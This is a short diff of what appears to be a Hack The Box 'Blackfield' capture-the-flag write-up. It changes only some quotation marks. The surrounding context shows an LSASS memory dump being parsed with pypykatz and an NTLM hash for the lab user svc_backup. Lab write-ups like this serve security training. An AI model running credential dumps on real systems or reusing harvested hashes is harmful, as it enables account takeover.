Vorkharium/vorkharium.github.io/_posts/2024-11-03-HTB-Blackfield-Write-up.md

 unzip lsass.zip
 pypykatz lsa minidump lsass.DMP
 ```
-We got many hashes from the dump, but after testing them we will find out that the only valid hash is the hash for the user "svc_backup":
+We got many hashes from the dump, but after testing them we will find out that the only valid hash is the hash for the user svc_backup:
 ```shell
 9658d1d1dcd9250115e2205d9f48400d
 ```